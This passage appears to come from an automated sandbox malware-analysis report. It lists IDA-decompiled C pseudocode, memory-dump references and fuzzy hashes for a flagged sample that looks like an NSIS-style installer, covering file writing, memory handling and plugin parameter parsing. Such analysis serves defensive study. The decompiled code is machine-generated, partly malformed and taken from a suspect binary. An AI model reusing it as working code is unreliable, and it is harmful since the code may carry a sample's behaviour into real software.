                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: Text$ItemTimerWindowwsprintf
                                  • String ID: verifying installer: %d%%
                                  • API String ID: 1451636040-82062127
                                  • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                  • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                  • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                  • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E732F2655() {
                                  				intOrPtr _t24;
                                  				void* _t26;
                                  				intOrPtr _t27;
                                  				signed int _t39;
                                  				void* _t40;
                                  				void* _t43;
                                  				intOrPtr _t44;
                                  				void* _t45;
                                  
                                  				_t40 = E732F12BB();
                                  				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                                  				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                                  				_t43 = (_t44 + 0x81 << 5) + _t24;
                                  				do {
                                  					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                                  					}
                                  					_t39 =  *(_t43 - 8) & 0x000000ff;
                                  					if(_t39 <= 7) {
                                  						switch( *((intOrPtr*)(_t39 * 4 +  &M732F2784))) {
                                  							case 0:
                                  								 *_t40 = 0;
                                  								goto L17;
                                  							case 1:
                                  								__eax =  *__eax;
                                  								if(__ecx > __ebx) {
                                  									 *(__esp + 0x10) = __ecx;
                                  									__ecx =  *(0x732f407c + __edx * 4);
                                  									__edx =  *(__esp + 0x10);
                                  									__ecx = __ecx * __edx;
                                  									asm("sbb edx, edx");
                                  									__edx = __edx & __ecx;
                                  									__eax = __eax &  *(0x732f409c + __edx * 4);
                                  								}
                                  								_push(__eax);
                                  								goto L15;
                                  							case 2:
                                  								__eax = E732F1510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                  								goto L16;
                                  							case 3:
                                  								__ecx =  *0x732f506c;
                                  								__edx = __ecx - 1;
                                  								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                                  								__eax =  *0x732f506c;
                                  								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                                  								goto L17;
                                  							case 4:
                                  								__eax = lstrcpynW(__edi,  *__eax,  *0x732f506c);
                                  								goto L17;
                                  							case 5:
                                  								_push( *0x732f506c);
                                  								_push(__edi);
                                  								_push( *__eax);
                                  								__imp__StringFromGUID2();
                                  								goto L17;
                                  							case 6:
                                  								_push( *__esi);
                                  								L15:
                                  								__eax = wsprintfW(__edi, 0x732f5000);
                                  								L16:
                                  								__esp = __esp + 0xc;
                                  								goto L17;
                                  						}
                                  					}
                                  					L17:
                                  					_t26 =  *(_t43 + 0x14);
                                  					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                  						GlobalFree(_t26);
                                  					}
                                  					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                  					if(_t27 != 0) {
                                  						if(_t27 != 0xffffffff) {
                                  							if(_t27 > 0) {
                                  								E732F1381(_t27 - 1, _t40);
                                  								goto L26;
                                  							}
                                  						} else {
                                  							E732F1312(_t40);
                                  							L26:
                                  						}
                                  					}
                                  					_t44 = _t44 - 1;
                                  					_t43 = _t43 - 0x20;
                                  				} while (_t44 >= 0);
                                  				return GlobalFree(_t40);
                                  			}











                                  0x732f265f
                                  0x732f2661
                                  0x732f2665
                                  0x732f2674
                                  0x732f2678
                                  0x732f267d
                                  0x732f267d
                                  0x732f2685
                                  0x732f268c
                                  0x732f2692
                                  0x00000000
                                  0x732f2699
                                  0x00000000
                                  0x00000000
                                  0x732f26a1
                                  0x732f26a5
                                  0x732f26a8
                                  0x732f26ac
                                  0x732f26b3
                                  0x732f26b7
                                  0x732f26bd
                                  0x732f26bf
                                  0x732f26c1
                                  0x732f26c1
                                  0x732f26c8
                                  0x00000000
                                  0x00000000
                                  0x732f26d1
                                  0x00000000
                                  0x00000000
                                  0x732f26d8
                                  0x732f26de
                                  0x732f26e8
                                  0x732f26ee
                                  0x732f26f3
                                  0x00000000
                                  0x00000000
                                  0x732f2714
                                  0x00000000
                                  0x00000000
                                  0x732f26fa
                                  0x732f2700
                                  0x732f2701
                                  0x732f2703
                                  0x00000000
                                  0x00000000
                                  0x732f271c
                                  0x732f271e
                                  0x732f2724
                                  0x732f272a
                                  0x732f272a
                                  0x00000000
                                  0x00000000
                                  0x732f2692
                                  0x732f272d
                                  0x732f272d
                                  0x732f2732
                                  0x732f2743
                                  0x732f2743
                                  0x732f2749
                                  0x732f274e
                                  0x732f2753
                                  0x732f275f
                                  0x732f2764
                                  0x00000000
                                  0x732f2769
                                  0x732f2755
                                  0x732f2756
                                  0x732f276a
                                  0x732f276a
                                  0x732f2753
                                  0x732f276b
                                  0x732f276c
                                  0x732f276f
                                  0x732f2783

                                  APIs
                                    • Part of subcall function 732F12BB: GlobalAlloc.KERNELBASE(00000040,?,732F12DB,?,732F137F,00000019,732F11CA,-000000A0), ref: 732F12C5
                                  • GlobalFree.KERNEL32 ref: 732F2743
                                  • GlobalFree.KERNEL32 ref: 732F2778
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.778451619.00000000732F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 732F0000, based on PE: true
                                  • Associated: 00000000.00000002.778443971.00000000732F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.778458851.00000000732F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.778463521.00000000732F6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_732f0000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: Global$Free$Alloc
                                  • String ID:
                                  • API String ID: 1780285237-0
                                  • Opcode ID: f67cc7098415195e281019911e2cef422427020b8f1e457839c59b2689d9b9ce
                                  • Instruction ID: 5b16ec863b3ad5509b2c5194d6f09d1a0409012a1411f9194fd348eaa1c09b84
                                  • Opcode Fuzzy Hash: f67cc7098415195e281019911e2cef422427020b8f1e457839c59b2689d9b9ce
                                  • Instruction Fuzzy Hash: 8931067660421BEFD7169F55C988F2AFBBAFF86310324812CF10583250C7756884DF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E00402950(int __ebx, void* __eflags) {
                                  				WCHAR* _t26;
                                  				void* _t29;
                                  				long _t37;
                                  				int _t49;
                                  				void* _t52;
                                  				void* _t54;
                                  				void* _t56;
                                  				void* _t59;
                                  				void* _t60;
                                  				void* _t61;
                                  
                                  				_t49 = __ebx;
                                  				_t52 = 0xfffffd66;
                                  				_t26 = E00402DA6(0xfffffff0);
                                  				_t55 = _t26;
                                  				 *(_t61 - 0x40) = _t26;
                                  				if(E00405E83(_t26) == 0) {
                                  					E00402DA6(0xffffffed);
                                  				}
                                  				E00406008(_t55);
                                  				_t29 = E0040602D(_t55, 0x40000000, 2);
                                  				 *(_t61 + 8) = _t29;
                                  				if(_t29 != 0xffffffff) {
                                  					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                  					if( *(_t61 - 0x28) != _t49) {
                                  						_t37 =  *0x434f14;
                                  						 *(_t61 - 0x44) = _t37;
                                  						_t54 = GlobalAlloc(0x40, _t37);
                                  						if(_t54 != _t49) {
                                  							E004034E5(_t49);
                                  							E004034CF(_t54,  *(_t61 - 0x44));
                                  							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                  							 *(_t61 - 0x10) = _t59;
                                  							if(_t59 != _t49) {
                                  								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                  								while( *_t59 != _t49) {
                                  									_t60 = _t59 + 8;
                                  									 *(_t61 - 0x3c) =  *_t59;
                                  									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                  									_t59 = _t60 +  *(_t61 - 0x3c);
                                  								}
                                  								GlobalFree( *(_t61 - 0x10));
                                  							}
                                  							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                  							GlobalFree(_t54);
                                  							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                  						}
                                  					}
                                  					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                  					CloseHandle( *(_t61 + 8));
                                  				}
                                  				_t56 = 0xfffffff3;
                                  				if(_t52 < _t49) {
                                  					_t56 = 0xffffffef;
                                  					DeleteFileW( *(_t61 - 0x40));
                                  					 *((intOrPtr*)(_t61 - 4)) = 1;
                                  				}
                                  				_push(_t56);
                                  				E00401423();
                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
                                  				return 0;
                                  			}













                                  0x00402950
                                  0x00402952
                                  0x00402957
                                  0x0040295c
                                  0x0040295f
                                  0x00402969
                                  0x0040296d
                                  0x0040296d
                                  0x00402973
                                  0x00402980
                                  0x00402988
                                  0x0040298b
                                  0x00402997
                                  0x0040299a
                                  0x004029a0
                                  0x004029ae
                                  0x004029b3
                                  0x004029b7
                                  0x004029ba
                                  0x004029c3
                                  0x004029cf
                                  0x004029d3
                                  0x004029d6
                                  0x004029e0
                                  0x004029ff
                                  0x004029ec
                                  0x004029f4
                                  0x004029f7
                                  0x004029fc
                                  0x004029fc
                                  0x00402a06
                                  0x00402a06
                                  0x00402a13
                                  0x00402a19
                                  0x00402a1f
                                  0x00402a1f
                                  0x004029b7
                                  0x00402a33
                                  0x00402a35
                                  0x00402a35
                                  0x00402a3f
                                  0x00402a40
                                  0x00402a44
                                  0x00402a48
                                  0x00402a4e
                                  0x00402a4e
                                  0x00402a55
                                  0x004022f1
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                  • GlobalFree.KERNEL32 ref: 00402A06
                                  • GlobalFree.KERNEL32 ref: 00402A19
                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                  • String ID:
                                  • API String ID: 2667972263-0
                                  • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                  • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                  • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                  • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 97%
                                  			E732F1979(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                                  				void* _v8;
                                  				signed int _v12;
                                  				signed int _v20;
                                  				signed int _v24;
                                  				char _v76;
                                  				void _t45;
                                  				signed int _t46;
                                  				signed int _t47;
                                  				signed int _t48;
                                  				signed int _t57;
                                  				signed int _t58;
                                  				signed int _t59;
                                  				signed int _t60;
                                  				signed int _t61;
                                  				void* _t67;
                                  				void* _t68;
                                  				void* _t69;
                                  				void* _t70;
                                  				void* _t71;
                                  				signed int _t77;
                                  				void* _t81;
                                  				signed int _t83;
                                  				signed int _t85;
                                  				signed int _t87;
                                  				signed int _t90;
                                  				void* _t101;
                                  
                                  				_t85 = __edx;
                                  				 *0x732f506c = _a8;
                                  				_t77 = 0;
                                  				 *0x732f5070 = _a16;
                                  				_v12 = 0;
                                  				_v8 = E732F12E3();
                                  				_t90 = E732F13B1(_t42);
                                  				_t87 = _t85;
                                  				_t81 = E732F12E3();
                                  				_a8 = _t81;
                                  				_t45 =  *_t81;
                                  				if(_t45 != 0x7e && _t45 != 0x21) {
                                  					_a16 = E732F12E3();
                                  					_t77 = E732F13B1(_t74);
                                  					_v12 = _t85;
                                  					GlobalFree(_a16);
                                  					_t81 = _a8;
                                  				}
                                  				_t46 =  *_t81 & 0x0000ffff;
                                  				_t101 = _t46 - 0x2f;
                                  				if(_t101 > 0) {
                                  					_t47 = _t46 - 0x3c;
                                  					__eflags = _t47;
                                  					if(_t47 == 0) {
                                  						__eflags =  *((short*)(_t81 + 2)) - 0x3c;
                                  						if( *((short*)(_t81 + 2)) != 0x3c) {
                                  							__eflags = _t87 - _v12;
                                  							if(__eflags > 0) {
                                  								L56:
                                  								_t48 = 0;
                                  								__eflags = 0;
                                  								L57:
                                  								asm("cdq");
                                  								L58:
                                  								_t90 = _t48;
                                  								_t87 = _t85;
                                  								L59:
                                  								E732F1510(_t85, _t90, _t87,  &_v76);
                                  								E732F1312( &_v76);
                                  								GlobalFree(_v8);
                                  								return GlobalFree(_a8);
                                  							}
                                  							if(__eflags < 0) {
                                  								L49:
                                  								__eflags = 0;
                                  								L50:
                                  								_t48 = 1;
                                  								goto L57;
                                  							}
                                  							__eflags = _t90 - _t77;
                                  							if(_t90 < _t77) {
                                  								goto L49;
                                  							}
                                  							goto L56;
                                  						}
                                  						_t85 = _t87;
                                  						_t48 = E732F3050(_t90, _t77, _t85);
                                  						goto L58;
                                  					}
                                  					_t57 = _t47 - 1;
                                  					__eflags = _t57;
                                  					if(_t57 == 0) {
                                  						__eflags = _t90 - _t77;
                                  						if(_t90 != _t77) {
                                  							goto L56;
                                  						}
                                  						__eflags = _t87 - _v12;
                                  						if(_t87 != _v12) {
                                  							goto L56;
                                  						}
                                  						goto L49;
                                  					}
                                  					_t58 = _t57 - 1;
                                  					__eflags = _t58;
                                  					if(_t58 == 0) {
                                  						__eflags =  *((short*)(_t81 + 2)) - 0x3e;
                                  						if( *((short*)(_t81 + 2)) != 0x3e) {
                                  							__eflags = _t87 - _v12;
                                  							if(__eflags < 0) {
                                  								goto L56;
                                  							}
                                  							if(__eflags > 0) {
                                  								goto L49;
                                  							}
                                  							__eflags = _t90 - _t77;
                                  							if(_t90 <= _t77) {
                                  								goto L56;
                                  							}
                                  							goto L49;
                                  						}
                                  						__eflags =  *((short*)(_t81 + 4)) - 0x3e;
                                  						_t85 = _t87;
                                  						_t59 = _t90;
                                  						_t83 = _t77;
                                  						if( *((short*)(_t81 + 4)) != 0x3e) {
                                  							_t48 = E732F3070(_t59, _t83, _t85);
                                  						} else {
                                  							_t48 = E732F30A0(_t59, _t83, _t85);
                                  						}
                                  						goto L58;
                                  					}
                                  					_t60 = _t58 - 0x20;
                                  					__eflags = _t60;
                                  					if(_t60 == 0) {
                                  						_t90 = _t90 ^ _t77;
                                  						_t87 = _t87 ^ _v12;
                                  						goto L59;
                                  					}
                                  					_t61 = _t60 - 0x1e;
                                  					__eflags = _t61;
                                  					if(_t61 == 0) {
                                  						__eflags =  *((short*)(_t81 + 2)) - 0x7c;
                                  						if( *((short*)(_t81 + 2)) != 0x7c) {
                                  							_t90 = _t90 | _t77;
                                  							_t87 = _t87 | _v12;
                                  							goto L59;
                                  						}
                                  						__eflags = _t90 | _t87;
                                  						if((_t90 | _t87) != 0) {
                                  							goto L49;
                                  						}
                                  						__eflags = _t77 | _v12;
                                  						if((_t77 | _v12) != 0) {
                                  							goto L49;
                                  						}
                                  						goto L56;
                                  					}
                                  					__eflags = _t61 == 0;
                                  					if(_t61 == 0) {
                                  						_t90 =  !_t90;
                                  						_t87 =  !_t87;
                                  					}
                                  					goto L59;
                                  				}
                                  				if(_t101 == 0) {
                                  					L21:
                                  					__eflags = _t77 | _v12;
                                  					if((_t77 | _v12) != 0) {
                                  						_v24 = E732F2EE0(_t90, _t87, _t77, _v12);
                                  						_v20 = _t85;
                                  						_t48 = E732F2F90(_t90, _t87, _t77, _v12);
                                  						_t81 = _a8;
                                  					} else {
                                  						_v24 = _v24 & 0x00000000;
                                  						_v20 = _v20 & 0x00000000;
                                  						_t48 = _t90;
                                  						_t85 = _t87;
                                  					}
                                  					__eflags =  *_t81 - 0x2f;
                                  					if( *_t81 != 0x2f) {
                                  						goto L58;
                                  					} else {
                                  						_t90 = _v24;
                                  						_t87 = _v20;
                                  						goto L59;
                                  					}
                                  				}
                                  				_t67 = _t46 - 0x21;
                                  				if(_t67 == 0) {
                                  					_t48 = 0;
                                  					__eflags = _t90 | _t87;
                                  					if((_t90 | _t87) != 0) {
                                  						goto L57;
                                  					}
                                  					goto L50;
                                  				}
                                  				_t68 = _t67 - 4;
                                  				if(_t68 == 0) {
                                  					goto L21;
                                  				}
                                  				_t69 = _t68 - 1;
                                  				if(_t69 == 0) {
                                  					__eflags =  *((short*)(_t81 + 2)) - 0x26;
                                  					if( *((short*)(_t81 + 2)) != 0x26) {
                                  						_t90 = _t90 & _t77;
                                  						_t87 = _t87 & _v12;
                                  						goto L59;
                                  					}
                                  					__eflags = _t90 | _t87;
                                  					if((_t90 | _t87) == 0) {
                                  						goto L56;
                                  					}
                                  					__eflags = _t77 | _v12;
                                  					if((_t77 | _v12) == 0) {
                                  						goto L56;
                                  					}
                                  					goto L49;
                                  				}
                                  				_t70 = _t69 - 4;
                                  				if(_t70 == 0) {
                                  					_t48 = E732F2EA0(_t90, _t87, _t77, _v12);
                                  					goto L58;
                                  				} else {
                                  					_t71 = _t70 - 1;
                                  					if(_t71 == 0) {
                                  						_t90 = _t90 + _t77;
                                  						asm("adc edi, [ebp-0x8]");
                                  					} else {
                                  						if(_t71 == 0) {
                                  							_t90 = _t90 - _t77;
                                  							asm("sbb edi, [ebp-0x8]");
                                  						}
                                  					}
                                  					goto L59;
                                  				}
                                  			}





























                                  0x732f1979
                                  0x732f1983
                                  0x732f198c
                                  0x732f198f
                                  0x732f1994
                                  0x732f199d
                                  0x732f19a6
                                  0x732f19a8
                                  0x732f19af
                                  0x732f19b1
                                  0x732f19b4
                                  0x732f19bb
                                  0x732f19c9
                                  0x732f19d2
                                  0x732f19d7
                                  0x732f19da
                                  0x732f19e0
                                  0x732f19e0
                                  0x732f19e3
                                  0x732f19e6
                                  0x732f19e9
                                  0x732f1ab1
                                  0x732f1ab1
                                  0x732f1ab4
                                  0x732f1b34
                                  0x732f1b39
                                  0x732f1b48
                                  0x732f1b4b
                                  0x732f1b53
                                  0x732f1b53
                                  0x732f1b53
                                  0x732f1b55
                                  0x732f1b55
                                  0x732f1b56
                                  0x732f1b56
                                  0x732f1b58
                                  0x732f1b5a
                                  0x732f1b60
                                  0x732f1b69
                                  0x732f1b7a
                                  0x732f1b85
                                  0x732f1b85
                                  0x732f1b4d
                                  0x732f1b2f
                                  0x732f1b2f
                                  0x732f1b31
                                  0x732f1b31
                                  0x00000000
                                  0x732f1b31
                                  0x732f1b4f
                                  0x732f1b51
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x732f1b51
                                  0x732f1b3d
                                  0x732f1b41
                                  0x00000000
                                  0x732f1b41
                                  0x732f1ab6
                                  0x732f1ab6
                                  0x732f1ab7
                                  0x732f1b26
                                  0x732f1b28
                                  0x00000000
                                  0x00000000
                                  0x732f1b2a
                                  0x732f1b2d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x732f1b2d
                                  0x732f1ab9
                                  0x732f1ab9
                                  0x732f1aba
                                  0x732f1af7
                                  0x732f1afc
                                  0x732f1b19
                                  0x732f1b1c
                                  0x00000000
                                  0x00000000
                                  0x732f1b1e
                                  0x00000000
                                  0x00000000
                                  0x732f1b20
                                  0x732f1b22
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x732f1b24
                                  0x732f1afe
                                  0x732f1b03
                                  0x732f1b05
                                  0x732f1b07
                                  0x732f1b09
                                  0x732f1b12
                                  0x732f1b0b
                                  0x732f1b0b
                                  0x732f1b0b
                                  0x00000000
                                  0x732f1b09
                                  0x732f1abc
                                  0x732f1abc
                                  0x732f1abf
                                  0x732f1af0
                                  0x732f1af2
                                  0x00000000
                                  0x732f1af2
                                  0x732f1ac1
                                  0x732f1ac1
                                  0x732f1ac4
                                  0x732f1ad7
                                  0x732f1adc
                                  0x732f1ae9
                                  0x732f1aeb
                                  0x00000000
                                  0x732f1aeb
                                  0x732f1ade
                                  0x732f1ae0
                                  0x00000000
                                  0x00000000
                                  0x732f1ae2
                                  0x732f1ae5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x732f1ae7
                                  0x732f1ac7
                                  0x732f1ac8
                                  0x732f1ace
                                  0x732f1ad0
                                  0x732f1ad0
                                  0x00000000
                                  0x732f1ac8
                                  0x732f19ef
                                  0x732f1a68
                                  0x732f1a6a
                                  0x732f1a6d
                                  0x732f1a8b
                                  0x732f1a8e
                                  0x732f1a94
                                  0x732f1a99
                                  0x732f1a6f
                                  0x732f1a6f
                                  0x732f1a73
                                  0x732f1a77
                                  0x732f1a79
                                  0x732f1a79
                                  0x732f1a9c
                                  0x732f1aa0
                                  0x00000000
                                  0x732f1aa6
                                  0x732f1aa6
                                  0x732f1aa9
                                  0x00000000
                                  0x732f1aa9
                                  0x732f1aa0
                                  0x732f19f1
                                  0x732f19f4
                                  0x732f1a59
                                  0x732f1a5b
                                  0x732f1a5d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x732f1a63
                                  0x732f19f6
                                  0x732f19f9
                                  0x00000000
                                  0x00000000
                                  0x732f19fb
                                  0x732f19fc
                                  0x732f1a32
                                  0x732f1a37
                                  0x732f1a4f
                                  0x732f1a51
                                  0x00000000
                                  0x732f1a51
                                  0x732f1a39
                                  0x732f1a3b
                                  0x00000000
                                  0x00000000
                                  0x732f1a41
                                  0x732f1a44
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x732f1a4a
                                  0x732f19fe
                                  0x732f1a01
                                  0x732f1a28
                                  0x00000000
                                  0x732f1a03
                                  0x732f1a03
                                  0x732f1a04
                                  0x732f1a18
                                  0x732f1a1a
                                  0x732f1a06
                                  0x732f1a08
                                  0x732f1a0e
                                  0x732f1a10
                                  0x732f1a10
                                  0x732f1a08
                                  0x00000000
                                  0x732f1a04

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.778451619.00000000732F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 732F0000, based on PE: true
                                  • Associated: 00000000.00000002.778443971.00000000732F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.778458851.00000000732F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.778463521.00000000732F6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_732f0000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: FreeGlobal
                                  • String ID:
                                  • API String ID: 2979337801-0
                                  • Opcode ID: 7141e2abee46df1143606b49d61009f677612253b69a55075e51cd93f39fabc1
                                  • Instruction ID: 07cfeeffde40f66751fba9c12286f408dc2321643068c4af1ba277997a257ee5
                                  • Opcode Fuzzy Hash: 7141e2abee46df1143606b49d61009f677612253b69a55075e51cd93f39fabc1
                                  • Instruction Fuzzy Hash: D251C332F1011BEBDB069FA4C44079DFABAEB44314FD8815AD406B3398E6B5BAC5C791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E732F2480(void* __edx) {
                                  				void* _t37;
                                  				signed int _t38;
                                  				void* _t39;
                                  				void* _t41;
                                  				signed char* _t42;
                                  				signed char* _t51;
                                  				void* _t52;
                                  				void* _t54;
                                  
                                  				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                  				while(1) {
                                  					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                  					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                  					_t52 = _t51[0x18];
                                  					if(_t52 == 0) {
                                  						goto L9;
                                  					}
                                  					_t41 = 0x1a;
                                  					if(_t52 == _t41) {
                                  						goto L9;
                                  					}
                                  					if(_t52 != 0xffffffff) {
                                  						if(_t52 <= 0 || _t52 > 0x19) {
                                  							_t51[0x18] = _t41;
                                  							goto L12;
                                  						} else {
                                  							_t37 = E732F135A(_t52 - 1);
                                  							L10:
                                  							goto L11;
                                  						}
                                  					} else {
                                  						_t37 = E732F12E3();
                                  						L11:
                                  						_t52 = _t37;
                                  						L12:
                                  						_t13 =  &(_t51[8]); // 0x1020
                                  						_t42 = _t13;
                                  						if(_t51[4] >= 0) {
                                  						}
                                  						_t38 =  *_t51 & 0x000000ff;
                                  						_t51[0x1c] = 0;
                                  						if(_t38 > 7) {
                                  							L27:
                                  							_t39 = GlobalFree(_t52);
                                  							if( *(_t54 + 0x10) == 0) {
                                  								return _t39;
                                  							}
                                  							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                  								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                  							} else {
                                  								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                  							}
                                  							continue;
                                  						} else {
                                  							switch( *((intOrPtr*)(_t38 * 4 +  &M732F25F8))) {
                                  								case 0:
                                  									 *_t42 = 0;
                                  									goto L27;
                                  								case 1:
                                  									__eax = E732F13B1(__ebp);
                                  									goto L21;
                                  								case 2:
                                  									 *__edi = E732F13B1(__ebp);
                                  									__edi[1] = __edx;
                                  									goto L27;
                                  								case 3:
                                  									__eax = GlobalAlloc(0x40,  *0x732f506c);
                                  									 *(__esi + 0x1c) = __eax;
                                  									__edx = 0;
                                  									 *__edi = __eax;
                                  									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x732f506c, __eax,  *0x732f506c, 0, 0);
                                  									goto L27;
                                  								case 4:
                                  									__eax = E732F12CC(__ebp);
                                  									 *(__esi + 0x1c) = __eax;
                                  									L21:
                                  									 *__edi = __eax;
                                  									goto L27;
                                  								case 5:
                                  									__eax = GlobalAlloc(0x40, 0x10);
                                  									_push(__eax);
                                  									 *(__esi + 0x1c) = __eax;
                                  									_push(__ebp);
                                  									 *__edi = __eax;
                                  									__imp__CLSIDFromString();
                                  									goto L27;
                                  								case 6:
                                  									if( *__ebp != __cx) {
                                  										__eax = E732F13B1(__ebp);
                                  										 *__ebx = __eax;
                                  									}
                                  									goto L27;
                                  								case 7:
                                  									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                  									( *(__esi + 0x18) - 1) *  *0x732f506c =  *0x732f5074 + ( *(__esi + 0x18) - 1) *  *0x732f506c * 2 + 0x18;
                                  									 *__ebx =  *0x732f5074 + ( *(__esi + 0x18) - 1) *  *0x732f506c * 2 + 0x18;
                                  									asm("cdq");
                                  									__eax = E732F1510(__edx,  *0x732f5074 + ( *(__esi + 0x18) - 1) *  *0x732f506c * 2 + 0x18, __edx,  *0x732f5074 + ( *(__esi + 0x18) - 1) *  *0x732f506c * 2);
                                  									goto L27;
                                  							}
                                  						}
                                  					}
                                  					L9:
